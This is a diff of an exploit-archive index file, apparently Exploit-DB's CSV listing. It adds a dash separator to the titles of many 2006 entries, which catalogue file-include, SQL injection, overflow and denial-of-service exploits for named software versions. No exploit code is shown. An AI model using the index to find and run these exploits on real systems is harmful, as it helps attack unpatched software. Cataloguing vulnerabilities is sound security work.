2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln",2006-10-04,SpiderZ,php,webapps,0 @@ -2187,8 +2187,8 @@ id,file,description,date,author,platform,type,port 2493,platforms/php/webapps/2493.pl,"docmint <= 2.0 (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2496,platforms/php/webapps/2496.txt,"WebYep <= 1.1.9 (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery <= 1.4 (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2496,platforms/php/webapps/2496.txt,"WebYep <= 1.1.9 - (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke <= 2.5.8 file() Privilege Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 2500,platforms/php/webapps/2500.pl,"phpMyAgenda <= 3.1 (templates/header.php3) Local File Include Exploit",2006-10-10,"Nima Salehi",php,webapps,0 @@ -2200,14 +2200,14 @@ id,file,description,date,author,platform,type,port 2506,platforms/php/webapps/2506.txt,"Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom <= 1.6 - Remote Source Disclosure Vulnerability",2006-10-10,DarkFig,php,webapps,0 2508,platforms/php/webapps/2508.txt,"vtiger CRM <= 4.2 (calpath) Multiple Remote File Include Vulnerabilities",2006-10-10,the_day,php,webapps,0 -2509,platforms/php/webapps/2509.txt,"Exhibit Engine <= 1.5 RC 4 (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 +2509,platforms/php/webapps/2509.txt,"Exhibit Engine <= 1.5 RC 4 - (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 2510,platforms/php/webapps/2510.txt,"Claroline <= 1.8.0 rc1 (import.lib.php) Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 2511,platforms/php/webapps/2511.txt,"PHPLibrary <= 1.5.3 (grid3.lib.php) Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 2512,platforms/php/webapps/2512.txt,"Jinzora <= 2.1 (media.php) Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 2513,platforms/php/webapps/2513.txt,"ae2 (standart.inc.php) Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 2514,platforms/php/webapps/2514.txt,"n@board <= 3.1.9e (naboard_pnr.php) Remote File Include Vulnerability",2006-10-11,mdx,php,webapps,0 2515,platforms/multiple/dos/2515.txt,"Kmail <= 1.9.1 (IMG SRC) Remote Denial of Service Vulnerability",2006-10-11,nnp,multiple,dos,0 -2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 (import-archive.php) File Include Vulnerability",2006-10-11,"Nima Salehi",php,webapps,0 +2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include Vulnerability",2006-10-11,"Nima Salehi",php,webapps,0 2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include Vulnerability",2006-10-11,Zickox,php,webapps,0 @@ -2219,19 +2219,19 @@ id,file,description,date,author,platform,type,port 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Include Vulnerability",2006-10-12,"Mehmet Ince",php,webapps,0 2527,platforms/php/webapps/2527.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 -2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer <= 1.0 (pathToFiles) File Include Vulnerability",2006-10-12,Kw3[R]Ln,php,webapps,0 +2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer <= 1.0 - (pathToFiles) File Include Vulnerability",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod <= 0.1.4 - Remote File Include Vulnerability",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include Vulnerability",2006-10-12,boecke,php,webapps,0 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 (lang_prefix) Remote File Include Exploit",2006-10-12,r0ut3r,php,webapps,0 -2535,platforms/php/webapps/2535.txt,"phpMyConferences <= 8.0.2 (menu.inc.php) File Include Vulnerability",2006-10-13,k1tk4t,php,webapps,0 -2536,platforms/php/webapps/2536.txt,"Open Conference Systems <= 1.1.4 (fullpath) File Include Vulnerabilities",2006-10-13,k1tk4t,php,webapps,0 +2535,platforms/php/webapps/2535.txt,"phpMyConferences <= 8.0.2 - (menu.inc.php) File Include Vulnerability",2006-10-13,k1tk4t,php,webapps,0 +2536,platforms/php/webapps/2536.txt,"Open Conference Systems <= 1.1.4 - (fullpath) File Include Vulnerabilities",2006-10-13,k1tk4t,php,webapps,0 2537,platforms/php/webapps/2537.pl,"maluinfo <= 206.2.38 (bb_usage_stats.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2538,platforms/php/webapps/2538.pl,"phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2539,platforms/php/webapps/2539.txt,"Genepi <= 1.6 (genepi.php) Remote File Include Vulnerability",2006-10-13,Kw3[R]Ln,php,webapps,0 -2540,platforms/php/webapps/2540.txt,"Cdsagenda <= 4.2.9 (SendAlertEmail.php) File Include Vulnerability",2006-10-13,Drago84,php,webapps,0 +2540,platforms/php/webapps/2540.txt,"Cdsagenda <= 4.2.9 - (SendAlertEmail.php) File Include Vulnerability",2006-10-13,Drago84,php,webapps,0 2541,platforms/bsd/dos/2541.c,"FreeBSD <= 6.1-RELEASE-p10 (ftruncate) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 2542,platforms/bsd/dos/2542.c,"FreeBSD <= 6.1-RELEASE-p10 (scheduler) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Local Root Exploit",2006-10-13,"Marco Ivaldi",solaris,local,0 @@ -2278,7 +2278,7 @@ id,file,description,date,author,platform,type,port 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook <= 2.35 (g_rb_basedir) Remote File Include Exploit",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli <= 3.0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-17,the_day,php,webapps,0 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 -2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 +2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 - (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 2588,platforms/php/webapps/2588.txt,"Easynews <= 4.4.1 (admin.php) Authentication Bypass Vulnerability",2006-10-17,nuffsaid,php,webapps,0 2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability",2006-10-18,nuffsaid,php,webapps,0 @@ -2293,7 +2293,7 @@ id,file,description,date,author,platform,type,port 2599,platforms/php/webapps/2599.txt,"pandaBB (displayCategory) Remote File Include Vulnerabilities",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability",2006-10-19,nuffsaid,php,webapps,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit",2006-10-19,"Greg Linares",windows,remote,25 -2602,platforms/php/webapps/2602.txt,"Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability",2006-10-19,x_w0x,php,webapps,0 +2602,platforms/php/webapps/2602.txt,"Power Phlogger <= 2.0.9 - (config.inc.php3) File Include Vulnerability",2006-10-19,x_w0x,php,webapps,0 2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC <= 0.5.6b (quiz.php) Remote SQL Injection Vulnerability",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate (xml2rss.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 @@ -2305,7 +2305,7 @@ id,file,description,date,author,platform,type,port 2612,platforms/php/webapps/2612.txt,"PGOSD (misc/function.php3) Remote File Include Vulnerability",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module <= 1.8.1 - Remote Include Vulnerability",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability",2006-10-22,Drago84,php,webapps,0 -2615,platforms/php/webapps/2615.txt,"SpeedBerg <= 1.2beta1 (SPEEDBERG_PATH) File Include Vulnerabilities",2006-10-22,k1tk4t,php,webapps,0 +2615,platforms/php/webapps/2615.txt,"SpeedBerg <= 1.2beta1 - (SPEEDBERG_PATH) File Include Vulnerabilities",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 (common.php) Remote File Include Vulnerability",2006-10-22,"the master",php,webapps,0 @@ -2319,7 +2319,7 @@ id,file,description,date,author,platform,type,port 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 (includes/functions.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x (lib.editor.inc.php) Remote File Include Vulnerability",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 @@ -2344,24 +2344,24 @@ id,file,description,date,author,platform,type,port 2653,platforms/php/webapps/2653.txt,"MPCS <= 1.0 (path) Remote File Include Vulnerabilities",2006-10-26,v1per-haCker,php,webapps,0 2654,platforms/php/webapps/2654.txt,"ask_rave <= 0.9 PR (end.php footfile) Remote File Include Vulnerability",2006-10-26,v1per-haCker,php,webapps,0 2655,platforms/php/webapps/2655.php,"miniBB <= 2.0.2 (bb_func_txt.php) Remote File Include Exploit",2006-10-26,Kacper,php,webapps,0 -2656,platforms/php/webapps/2656.txt,"MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability",2006-10-26,"Mehmet Ince",php,webapps,0 +2656,platforms/php/webapps/2656.txt,"MiniBill <= 20061010 - (menu_builder.php) File Include Vulnerability",2006-10-26,"Mehmet Ince",php,webapps,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 Popup Address Bar Spoofing Weakness",2006-10-26,N/A,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote Multiple Vulnerabilities Exploit",2006-10-27,BlackHawk,php,webapps,0 2659,platforms/php/webapps/2659.php,"N/X WCMS <= 4.1 (nxheader.inc.php) Remote File Include Exploit",2006-10-27,Kacper,php,webapps,0 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - Remote SQL Injection Vulnerability",2006-10-27,w4ck1ng,php,webapps,0 2661,platforms/asp/webapps/2661.asp,"Php League 0.82 (classement.php) Remote SQL Injection Exploit",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulns",2006-10-27,"Soroush Dalili",asp,webapps,0 -2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0 +2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0 2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0 -2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 -2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 +2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 +2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0 -2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 (common.php) File Include Vulnerability",2006-10-29,"Mehmet Ince",php,webapps,0 +2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - (common.php) File Include Vulnerability",2006-10-29,"Mehmet Ince",php,webapps,0 2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 @@ -2408,7 +2408,7 @@ id,file,description,date,author,platform,type,port 2718,platforms/php/webapps/2718.txt,"SazCart <= 1.5 (cart.php) Remote File Include Vulnerability",2006-11-04,IbnuSina,php,webapps,0 2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 -2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 +2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 @@ -2418,7 +2418,7 @@ id,file,description,date,author,platform,type,port 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 (nfsd.exe) Remote Stack Overflow Exploit (meta)",2006-11-06,"Evgeny Legerov",windows,remote,2049 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service Exploit (meta)",2006-11-06,"Evgeny Legerov",linux,dos,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums (admin/index.php) Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 -2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability",2006-11-06,ajann,php,webapps,0 +2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Include Vulnerability",2006-11-06,ajann,php,webapps,0 2733,platforms/php/webapps/2733.txt,"iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability",2006-11-07,nuffsaid,php,webapps,0 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 @@ -2461,7 +2461,7 @@ id,file,description,date,author,platform,type,port 2772,platforms/asp/webapps/2772.htm,"Online Event Registration <= 2.0 (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= 1.3 - (default.asp) Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 -2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 +2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"contentnow 1.30 (upload/XSS) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability",2006-11-14,"Hidayat Sagita",php,webapps,0 @@ -2483,7 +2483,7 @@ id,file,description,date,author,platform,type,port 2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 -2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0 +2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 - Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0 @@ -2559,7 +2559,7 @@ id,file,description,date,author,platform,type,port 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 (search.php) Remote Include Vulnerability",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies <= 1.3.0 - Remote File Include Vulnerability",2006-12-02,bd0rk,php,webapps,0 -2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0 +2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0 2887,platforms/windows/remote/2887.pl,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 2888,platforms/php/webapps/2888.php,"Envolution <= 1.1.0 (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0 @@ -2583,9 +2583,9 @@ id,file,description,date,author,platform,type,port 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability",2006-12-09,ajann,asp,webapps,0 2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 (product) Remote SQL Injection Vulnerability",2006-12-09,ajann,asp,webapps,0 2909,platforms/asp/webapps/2909.txt,"HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass Vulnerability",2006-12-09,ajann,asp,webapps,0 -2910,platforms/multiple/dos/2910.txt,"Sophos Antivirus CHM File Heap Overflow PoC",2006-12-10,"Damian Put",multiple,dos,0 -2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 -2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 +2910,platforms/multiple/dos/2910.txt,"Sophos Antivirus - .CHM File Heap Overflow PoC",2006-12-10,"Damian Put",multiple,dos,0 +2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 +2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 @@ -2594,7 +2594,7 @@ id,file,description,date,author,platform,type,port 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0 2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Include Vulnerability",2006-12-12,Lu7k,php,webapps,0 -2922,platforms/windows/dos/2922.txt,"Microsoft Word Document (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 +2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability",2006-12-12,"HACKERS PAL",php,webapps,0 2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 - Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 @@ -2640,7 +2640,7 @@ id,file,description,date,author,platform,type,port 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0 2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,N/A,windows,dos,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 -2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability",2006-12-21,"the master",php,webapps,0 +2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 - (htm2php.php) File Disclosure Vulnerability",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded <= 0.8.5 - Multiple Remote File Include Vulnerabilities",2006-12-21,nuffsaid,php,webapps,0 2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit",2006-12-21,InTeL,windows,dos,0 @@ -2692,7 +2692,7 @@ id,file,description,date,author,platform,type,port 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb <= 2.0.1b Remote File Include Vulnerability",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 -3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 +3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 - Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 (PRIVMSG) Remote Buffer Overflow PoC",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3024,platforms/windows/local/3024.c,"Microsoft Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 @@ -3003,7 +3003,7 @@ id,file,description,date,author,platform,type,port 3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 